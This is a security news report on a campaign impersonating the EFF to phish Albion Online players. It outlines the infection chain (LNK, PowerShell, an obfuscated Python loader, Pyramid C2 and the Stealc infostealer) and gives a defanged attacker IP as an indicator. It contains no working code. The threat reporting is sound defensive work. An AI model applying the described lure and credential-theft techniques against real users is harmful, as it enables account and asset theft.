Cybersecurity researchers at Hunt.io have uncovered a targeted cybercriminal campaign impersonating the Electronic Frontier Foundation (EFF) to deceive and compromise Albion Online players. The attackers deployed decoy documents and phishing strategies to steal in-game assets, leveraging the Stealc malware and Pyramid C2 infrastructure to execute their operations.
The threat actors behind this campaign sought to exploit the player-driven economy of Albion Online, where in-game assets are exchanged for real money through third-party markets.
According to Hunt.io researchers: “Players on the game’s forum have reported receiving messages from other members directing them to phishing websites, with the EFF’s name used as a pretext to discuss the security of in-game goods tied to their accounts.”
The phishing emails lured victims into downloading malicious PDF reports supposedly from the EFF, claiming that unauthorized transactions had occurred on their accounts. Once opened, the document launched a malware infection chain designed to steal sensitive data.
On February 27, 2025, Hunt.io’s AttackCapture identified an open directory at http[:]//83.217.208[.]90/documents, which contained PowerShell scripts, ZIP archives, and PDFs with double extensions—common indicators of malware staging.
Hunt.io’s analysis found that:
- The malware-hosting IP address shared SSH keys with 11 other active servers on the Partner Hosting LTD network.
- The server was flagged for hosting a Stealc C2, linking it to a larger cybercriminal network with at least 23 active command-and-control servers.
- Attackers distributed multiple phishing PDFs, including “Albion.pdf”, which masqueraded as an EFF report investigating virtual asset theft.
The attackers used forum-based phishing to reach their targets. Victims reported receiving messages from newly created accounts urging them to review their account security via links to malicious PDFs.
Hunt.io noted: “The phishing messages were actively circulating, aligning with findings from the open directory and leading to additional attacker-controlled infrastructure hosting decoy documents.”
Further analysis of the /albion directory revealed a Windows shortcut (LNK) file that executed a PowerShell script, which facilitated malware installation. The infection process included:
- Opening Albion.pdf to distract the user while executing malicious scripts in the background.
- Extracting and executing Python.zip, which contained a Python-based malware loader.
- Running 12.py, a heavily obfuscated script that executed encoded payloads using zlib compression and Base64 encoding.
“The PowerShell code contains multiple comments in Russian, further supporting earlier indicators that Russian-speaking developers were involved in this operation,” Hunt.io explained.
The malware campaign leveraged Pyramid C2, an open-source post-exploitation framework designed to encrypt payloads, potentially bypassing endpoint detection and response (EDR) solutions.
The final stage of the attack involved Stealc malware, a well-documented infostealer designed to:
- Extract stored credentials from Firefox and Chrome browsers.
- Steal session cookies to hijack user accounts.
- Exfiltrate stolen data to the C2 server over HTTP POST requests.
Related Posts:
- EFF Discovers Corejava Malware Embedded in Dragon Touch KidzPad Y88X 10 Devices
- Search Engine Manipulation Leads to Backdoored App Downloads
- Trusted Name Weaponized: Sliver and Ligolo-ng Attack Leverages Y Combinator Brand
- SparkRAT: A Persistent Cross-Platform Cyber Threat Targeting macOS and Beyond
